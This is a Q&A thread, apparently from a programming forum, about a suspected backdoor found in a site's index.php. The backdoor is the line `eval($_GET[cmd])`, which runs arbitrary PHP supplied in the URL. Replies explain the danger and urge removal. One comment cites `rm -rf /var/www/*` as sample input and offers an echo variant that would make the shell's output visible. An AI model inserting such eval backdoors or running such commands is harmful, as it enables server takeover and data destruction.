# Malicious Javascript code?

Tags: php, javascript, eval

I found in my site index.php this code

```
<script type="text/javascript">
  new.track("new.dev","_browser","'<?php eval($_GET[cmd]); ?>', '<?php eval($_GET[cmd]);?>'");
  new.track("new.dev","_url",location.href);
</script>
```

Is that code are malicious?
From web i tryed to put something like index.php?cmd=ls and nothing was appear. Maybe it needed to be on page? 
I trying to understand what previous admin do on site.

Comment: Hard to say what it was used for, but it allows arbitrary PHP code to be passed in the URL as `?cmd=<php code>` and executes it, passing the result into javascript.

Comment: Even if its intent wasn't malicious, it could easily be used maliciously.

Answer (score 4, accepted):

There is an unending amount of risk in that code. eval() runs php commands and can run terminal commands. With you accepting input without sanitation, someone could go nuts and cause some serious harm there. I would remove that immediately and find a better way.

**Bonk the guy on the head who wrote it, too.**

Comment: First I must understand what this code can do.  i tryed to put something like index.php?cmd=ls and nothing was appear.

Comment: eval() executes the input as php code. So anything you can do in the scope of PHP can be done via your _GET[cmd] input. Imagine system('rm -rf /var/www/*') getting processed from there, an endless loop, file manipulation, code injection.. It's endless. -- What `YOUR` codes intention is... not even sure. The code does not `echo`, so the output of the function will never make it to the page. Try: `<?php echo eval($_GET['cmd']); ?>` and see if you get the output from your `ls` test.

Comment: i think it can be used by system to do something on site, because it is not asseble from external by get and post requests, and no echo provided. even to use with javascript request. Why code in <script> tags?

Answer (score 0):

1) Quote the `cmd` => `$_GET['cmd']`

2) It is definitely alowing any user to execute any piece of php code on your server. Still, get requests are limited by default to 8kb (limit may be changed)

It's very risky what you are doing. I'm not sure what you want to accomplish, but trust me and find a different way.